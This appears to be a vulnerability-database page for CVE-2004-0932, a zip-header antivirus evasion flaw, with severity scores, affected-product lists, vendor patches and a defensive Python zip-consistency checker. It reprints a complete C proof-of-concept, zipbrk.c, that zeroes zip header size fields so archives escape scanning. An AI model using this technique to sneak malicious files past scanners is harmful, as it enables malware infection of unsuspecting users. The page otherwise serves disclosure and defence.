CVE-2004-0932
CVSS 7.5
Published: 2005-01-27 00:00:00
Revised: 2008-09-05 16:39:50

[Original] McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.


[CNNVD] McAfee AntiVirus zip antivirus detection bypass vulnerability (CNNVD-200501-286)

        McAfee Anti-Virus is an antivirus product.
        The McAfee Anti-Virus engine (DATS before 4398, released Oct 13th 2004, and DATS Driver before 4397, released October 6th 2004) handles zip files incorrectly, allowing a zip file to bypass antivirus detection.
        An attacker can craft a zip file whose local and global headers are both set to 0; such a file bypasses antivirus detection yet still extracts normally.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:mandrakesoft:mandrake_linux:10.1 (MandrakeSoft Mandrake Linux 10.1)
cpe:/a:ca:etrust_intrusion_detection:1.4.1.13 (Computer Associates eTrust Intrusion Detection 1.4.1.13)
cpe:/a:ca:etrust_antivirus:7.1 (Computer Associates eTrust Antivirus 7.1)
cpe:/a:sophos:sophos_anti-virus:3.78d (Sophos Sophos Anti-Virus 3.78d)
cpe:/a:rav_antivirus:rav_antivirus_for_file_servers:1.0
cpe:/a:sophos:sophos_puremessage_anti-virus:4.6
cpe:/o:mandrakesoft:mandrake_linux:10.1::x86_64
cpe:/a:sophos:sophos_anti-virus:3.84 (Sophos Sophos Anti-Virus 3.84)
cpe:/a:sophos:sophos_anti-virus:3.82 (Sophos Sophos Anti-Virus 3.82)
cpe:/a:ca:etrust_antivirus_gateway:7.0 (Computer Associates eTrust Antivirus Gateway 7.0)
cpe:/o:suse:suse_linux:9.2 (SuSE SuSE Linux 9.2)
cpe:/a:sophos:sophos_anti-virus:3.78 (Sophos Sophos Anti-Virus 3.78)
cpe:/a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2
cpe:/a:sophos:sophos_anti-virus:3.86 (Sophos Sophos Anti-Virus 3.86)
cpe:/a:ca:etrust_secure_content_manager:1.1 (Computer Associates eTrust Secure Content Manager 1.1)
cpe:/a:rav_antivirus:rav_antivirus_desktop:8.6
cpe:/a:sophos:sophos_anti-virus:3.4.6 (Sophos Sophos Anti-Virus 3.4.6)
cpe:/a:sophos:sophos_anti-virus:3.83 (Sophos Sophos Anti-Virus 3.83)
cpe:/o:gentoo:linux (Gentoo Linux)
cpe:/a:sophos:sophos_small_business_suite:1.0
cpe:/a:kaspersky_lab:kaspersky_anti-virus:4.0
cpe:/a:ca:etrust_ez_antivirus:6.3 (Computer Associates eTrust EZ Antivirus 6.3)
cpe:/a:ca:etrust_ez_antivirus:6.2 (Computer Associates eTrust EZ Antivirus 6.2)
cpe:/a:ca:etrust_ez_armor:2.0 (Computer Associates eTrust EZ Armor 2.0)
cpe:/a:sophos:sophos_anti-virus:3.80 (Sophos Sophos Anti-Virus 3.80)
cpe:/a:mcafee:antivirus_engine:4.3.20 (McAfee McAfee Antivirus Engine 4.3.20)
cpe:/a:ca:etrust_antivirus_gateway:7.1 (Computer Associates etrust Antivirus Gateway 7.1)
cpe:/a:archive_zip:archive_zip:1.13
cpe:/a:ca:etrust_antivirus:7.0_sp2
cpe:/a:ca:inoculateit:6.0 (Computer Associates InoculateIT 6.0)
cpe:/a:eset_software:nod32_antivirus:1.0.11
cpe:/a:eset_software:nod32_antivirus:1.0.13
cpe:/a:eset_software:nod32_antivirus:1.0.12
cpe:/a:ca:etrust_intrusion_detection:1.4.5 (Computer Associates eTrust Intrusion Detection 1.4.5)
cpe:/a:ca:etrust_secure_content_manager:1.0 (Computer Associates eTrust Secure Content Manager 1.0)
cpe:/a:ca:etrust_ez_armor:2.3 (Computer Associates eTrust EZ Armor 2.3)
cpe:/a:ca:etrust_ez_antivirus:6.1 (Computer Associates eTrust EZ Antivirus 6.1)
cpe:/a:ca:etrust_ez_armor:2.4 (Computer Associates eTrust EZ Armor 2.4)
cpe:/a:ca:etrust_intrusion_detection:1.5 (Computer Associates eTrust Intrusion Detection 1.5)
cpe:/a:ca:etrust_antivirus:7.0 (Computer Associates eTrust Antivirus 7.0)
cpe:/a:sophos:sophos_anti-virus:3.81 (Sophos Sophos Anti-Virus 3.81)
cpe:/a:ca:brightstor_arcserve_backup:11.1 (Computer Associates BrightStor ARCserve Backup 11.1)
cpe:/o:gentoo:linux:1.4 (Gentoo Linux 1.4)
cpe:/a:sophos:sophos_anti-virus:3.85 (Sophos Sophos Anti-Virus 3.85)
cpe:/a:kaspersky_lab:kaspersky_anti-virus:5.0
cpe:/a:ca:etrust_secure_content_manager:1.0:sp1
cpe:/a:kaspersky_lab:kaspersky_anti-virus:3.0
cpe:/a:sophos:sophos_anti-virus:3.79 (Sophos Sophos Anti-Virus 3.79)

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0932
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0932
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-286
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/11448
(VENDOR_ADVISORY)  BID  11448
http://xforce.iss.net/xforce/xfdb/17761
(VENDOR_ADVISORY)  XF  antivirus-zip-protection-bypass(17761)
http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20041018 Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability

- Vulnerability information

McAfee AntiVirus zip antivirus detection bypass vulnerability
High severity, Design error
2005-01-27 00:00:00 2006-12-21 00:00:00
Remote
        McAfee Anti-Virus is an antivirus product.
        The McAfee Anti-Virus engine (DATS before 4398, released Oct 13th 2004, and DATS Driver before 4397, released October 6th 2004) handles zip files incorrectly, allowing a zip file to bypass antivirus detection.
        An attacker can craft a zip file whose local and global headers are both set to 0; such a file bypasses antivirus detection yet still extracts normally.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue; patch download link:
        http://www.mcafee.com/

- Vulnerability information (629)

Multiple AntiVirus (zip file) Detection Bypass Exploit (EDBID:629)
multiple local
2004-11-14 Verified
0 oc192
N/A
/*
zipbrk.c - Proof-of-Concept for CAN-2004-0932 - CAN-2004-0937
Copyright (C) 2004 oc.192

This program is free software; you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not,
write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

oc.192 phreaker net
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset() and strcmp(); the original listing omitted this header */

/* Distance from the end of the 4-byte signature to the 4-byte size field that gets zeroed.
   Note that the ZIP format uses the opposite names: "PK\1\2" is the central directory file
   header and "PK\3\4" is the local file header. The constant names and the messages below
   keep the original author's wording. */
unsigned short LOCAL_HEADER_OFFSET = 16;
unsigned short CENTRAL_HEADER_OFFSET = 18;
unsigned long DATA_REPLACE_VALUE = 0x00000000;   /* unused: patch_file() writes four zero bytes */

void show_usage(void)
{
    printf("zipbrk - by oc.192 [oc.192@phreaker.net]\n");
    printf("Attempts to utilize the vulnerabilities described in:\n");
    printf("CAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\n"
           "CAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\n"
           "CAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\n");
    printf(" Usage: zipbrk <zip_file>\n");
}

/* Overwrite the four bytes at 'offset' with zeros. */
void patch_file(FILE *hfile, unsigned long offset)
{
    char *buffer = malloc(1);

    memset(buffer, 0, 1);
    fseek(hfile, offset, SEEK_SET);
    fwrite(buffer, 1, 1, hfile);
    fwrite(buffer, 1, 1, hfile);
    fwrite(buffer, 1, 1, hfile);
    fwrite(buffer, 1, 1, hfile);
    free(buffer);
}

/* Read the file one byte at a time, looking for the "PK\1\2" and "PK\3\4" signatures. */
void scan_file(char *filename)
{
    FILE *hfile;
    unsigned char buffer;
    unsigned long offset = 0;

    if ((hfile = fopen(filename, "rb+")) == NULL)
    {
        printf("[-] Error: Unable to open %s\n", filename);
        return;
    }
    printf("[+] Scanning %s ...\n", filename);

    while (fread(&buffer, sizeof(buffer), 1, hfile))
    {
        if (buffer == 0x50)                          /* 'P' */
        {
            fread(&buffer, sizeof(buffer), 1, hfile);
            if (buffer == 0x4B)                      /* 'K' */
            {
                fread(&buffer, sizeof(buffer), 1, hfile);
                if (buffer == 0x01)
                {
                    fread(&buffer, sizeof(buffer), 1, hfile);
                    if (buffer == 0x02)              /* "PK\1\2" found */
                    {
                        /* perform write */
                        offset = ftell(hfile);
                        offset = offset + LOCAL_HEADER_OFFSET;
                        printf(" [-] Writing local header patch [0x%.8lX]\n", offset);
                        patch_file(hfile, offset);
                        fseek(hfile, offset, SEEK_SET);  /* a seek is required between a write and the next read */
                    }
                }
                else if (buffer == 0x03)
                {
                    fread(&buffer, sizeof(buffer), 1, hfile);
                    if (buffer == 0x04)              /* "PK\3\4" found */
                    {
                        /* perform write */
                        offset = ftell(hfile);
                        offset = offset + CENTRAL_HEADER_OFFSET;
                        printf(" [-] Writing central header patch [0x%.8lX]\n", offset);
                        patch_file(hfile, offset);
                        fseek(hfile, offset, SEEK_SET);
                    }
                }
            }
        }
    }
    printf("[+] File scanning finished. EOF:%d ERR:%d\n", feof(hfile), ferror(hfile));
    fclose(hfile);
}

int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        show_usage();
        return 0;
    }

    if (!strcmp(argv[1], "-h") || !strcmp(argv[1], "/?"))
    {
        show_usage();
        return 0;
    }

    scan_file(argv[1]);

    return 0;
}

// milw0rm.com [2004-11-14]

- Vulnerability information (F35055)

zipbrk.zip (PacketStormID:F35055)
2004-11-20 00:00:00
oc.192
exploit,local,virus
CVE-2004-0932,CVE-2004-0937

This is a simple tool that searches for the central and local headers contained in a zip file and alters the uncompressed data variable to be 0 in an attempt to trick anti-virus software into not scanning the files inside the zip file.

- Vulnerability information

10963
Multiple Anti-Virus Zero Compressed Size Header Detection Bypass
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

2004-10-18 2004-09-16
Unknown 2004-09-21

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor Antivirus Software Zip Files Detection Evasion Vulnerability
Design Error 11448
Yes No
2004-10-18 12:00:00 2009-07-12 08:06:00
An anonymous researcher discovered this issue.

- Affected program versions

Sophos Small Business Suite 1.0
+ Sophos Anti-Virus 3.85
+ Sophos Anti-Virus 3.84
+ Sophos Anti-Virus 3.83
+ Sophos Anti-Virus 3.82
+ Sophos Anti-Virus 3.81
+ Sophos Anti-Virus 3.80
Sophos PureMessage Anti-Virus 4.6
Sophos Anti-Virus 3.86
Sophos Anti-Virus 3.85
Sophos Anti-Virus 3.84
Sophos Anti-Virus 3.83
Sophos Anti-Virus 3.82
Sophos Anti-Virus 3.81
Sophos Anti-Virus 3.80
Sophos Anti-Virus 3.79
Sophos Anti-Virus 3.78 d
Sophos Anti-Virus 3.78
Sophos Anti-Virus 3.4.6
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
S.u.S.E. Linux Personal 9.2
RAV AntiVirus RAV AntiVirus for Mail Servers 8.4.2
RAV AntiVirus RAV AntiVirus for File Servers 1.0
RAV AntiVirus RAV AntiVirus Desktop 8.6
McAfee Antivirus Engine 4.3.20
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Kaspersky Labs Antivirus Scanning Engine 5.0
Kaspersky Labs Antivirus Scanning Engine 4.0
Kaspersky Labs Antivirus Scanning Engine 3.0
Gentoo Linux 1.4
Gentoo Linux
Eset Software NOD32 Antivirus 1.0 13
Eset Software NOD32 Antivirus 1.0 12
Eset Software NOD32 Antivirus 1.0 11
Computer Associates InoculateIT 6.0
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 4.2.1
- IBM AIX 4.2
- IBM AIX 4.1.5
- IBM AIX 4.1.4
- IBM AIX 4.1.3
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 i386
- RedHat Linux 6.2 i386
- S.u.S.E. Linux 7.1 x86
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Computer Associates eTrust Secure Content Manager 1.1
Computer Associates eTrust Secure Content Manager 1.0 SP1
Computer Associates eTrust Secure Content Manager 1.0
Computer Associates eTrust Intrusion Detection 1.5
Computer Associates eTrust Intrusion Detection 1.4.5
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Computer Associates eTrust Intrusion Detection 1.4.1 .13
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Computer Associates eTrust EZ Armor 2.4
Computer Associates eTrust EZ Armor 2.3
Computer Associates eTrust EZ Armor 2.0
Computer Associates eTrust EZ Antivirus 6.3
Computer Associates eTrust EZ Antivirus 6.2
Computer Associates eTrust EZ Antivirus 6.1
Computer Associates eTrust Antivirus for the Gateway 7.1
Computer Associates eTrust Antivirus for the Gateway 7.0
Computer Associates eTrust Antivirus 7.1
Computer Associates eTrust Antivirus 7.0 SP2
Computer Associates eTrust Antivirus 7.0
Computer Associates BrightStor ARCServe Backup for Windows 11.1
Archive::Zip Archive::Zip 1.13
Archive::Zip Archive::Zip 1.14

- Unaffected program versions

Archive::Zip Archive::Zip 1.14

- Vulnerability discussion

Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected.

A remote attacker can craft a malicious zip archive and send it to a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection.

This issue is reported to affect products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV.

Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue.
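A defender-side consistency check for the header manipulation described above, added here as an example; it is not code from the page, the PoC author or any vendor. It walks the central directory, pairs each entry with its local file header and flags entries whose size fields are zero or disagree between the two headers while file data is physically present, which is exactly the state a scanner must treat as "scan anyway" rather than "nothing to scan". The `zip_entries`, `suspicious_entries` and `build_sample` names and the two-file sample archive are constructed for this example; entries that legitimately use a data descriptor (general purpose flag bit 3) are handled so that streamed archives are not reported.

```python
import io
import struct
import zipfile

EOCD_SIG, LFH_SIG = b"PK\x05\x06", b"PK\x03\x04"

def zip_entries(data):
    """Pair every central directory entry with its local file header (ZIP APPNOTE field offsets)."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, cd_off = struct.unpack_from("<H4xI", data, eocd + 10)
    entries, pos = [], cd_off
    for _ in range(count):
        crc, comp, uncomp, nlen, xlen, clen, lfh = struct.unpack_from("<IIIHHH8xI", data, pos + 16)
        name = data[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        if data[lfh:lfh + 4] != LFH_SIG:
            raise ValueError("bad local header offset for %r" % name)
        flags, lcrc, lcomp, luncomp, lnlen, lxlen = struct.unpack_from("<H6xIIIHH", data, lfh + 6)
        entries.append(dict(name=name, lfh=lfh, streamed=bool(flags & 0x8), cd=(crc, comp, uncomp),
                            local=(lcrc, lcomp, luncomp), data_start=lfh + 30 + lnlen + lxlen))
        pos += 46 + nlen + xlen + clen
    bounds = sorted([cd_off] + [e["lfh"] for e in entries])
    for e in entries:  # bytes physically present between this entry's data start and the next header
        e["actual"] = bounds[bounds.index(e["lfh"]) + 1] - e["data_start"]
    return entries

def suspicious_entries(data):
    """Names of entries whose declared sizes are zero or inconsistent although data is present."""
    flagged = []
    for e in zip_entries(data):
        (crc, comp, uncomp), (lcrc, lcomp, luncomp) = e["cd"], e["local"]
        streamed = e["streamed"]  # flag bit 3: local sizes are legitimately 0, real values are central
        zero_declared = comp == 0 or uncomp == 0 or (not streamed and (lcomp == 0 or luncomp == 0))
        has_data = crc != 0 or (not streamed and e["actual"] > 0)
        if (zero_declared and has_data) or (not streamed and (comp, uncomp) != (lcomp, luncomp)):
            flagged.append(e["name"])
    return flagged

def build_sample(zero_sizes):
    """Constructed input: a two-file archive, optionally with the first entry's size fields zeroed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payload.txt", b"harmless test data standing in for a detectable file\n" * 20)
        zf.writestr("readme.txt", b"hello")
    data = bytearray(buf.getvalue())
    if zero_sizes:  # compressed+uncompressed size in the local header (at offset 0) and central header
        cd = struct.unpack_from("<I", data, data.rfind(EOCD_SIG) + 16)[0]
        data[18:26] = data[cd + 20:cd + 28] = bytes(8)
    return bytes(data)
```

A scanner that hits a flagged entry should fall back to decompressing whatever bytes sit between the local header and the next signature instead of trusting the declared size.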

- Exploit

An exploit is not required.

A proof of concept exploit targeting multiple products is available:

- Solution

Various vendors have released updates and corrected this issue. Other vendors are reported to release fixes in the near future. Please see references and contact the vendor for more information.

Gentoo Linux has released an advisory (GLSA 200410-31) that fixes the Archive-Zip package and apparently resolves this issue. Gentoo Linux advises that all Archive::Zip users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-perl/Archive-Zip-1.14"

For more information please see the referenced Gentoo Linux advisory.

Mandrake Linux has released an advisory (MDKSA-2004:118) dealing with this issue in their Perl Archive::Zip package. Please see the referenced advisory for more information.

SuSE Linux has released a fixed version of the Perl Archive::Zip module to resolve this issue.

Computer Associates eTrust Secure Content Manager 1.0
Computer Associates eTrust Secure Content Manager 1.0 SP1
Computer Associates eTrust Secure Content Manager 1.1
Archive::Zip Archive::Zip 1.13
Computer Associates eTrust Intrusion Detection 1.4.1 .13
Computer Associates eTrust Intrusion Detection 1.4.5
Computer Associates eTrust Intrusion Detection 1.5
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.1 x86_64
Computer Associates eTrust EZ Armor 2.0
Computer Associates eTrust EZ Armor 2.3
Computer Associates eTrust EZ Armor 2.4
McAfee Antivirus Engine 4.3.20
Computer Associates InoculateIT 6.0
Computer Associates eTrust EZ Antivirus 6.1
Computer Associates eTrust EZ Antivirus 6.2
Computer Associates eTrust EZ Antivirus 6.3
Computer Associates eTrust Antivirus for the Gateway 7.0
Computer Associates eTrust Antivirus 7.0
Computer Associates eTrust Antivirus 7.1
Computer Associates eTrust Antivirus for the Gateway 7.1

- References

 

 
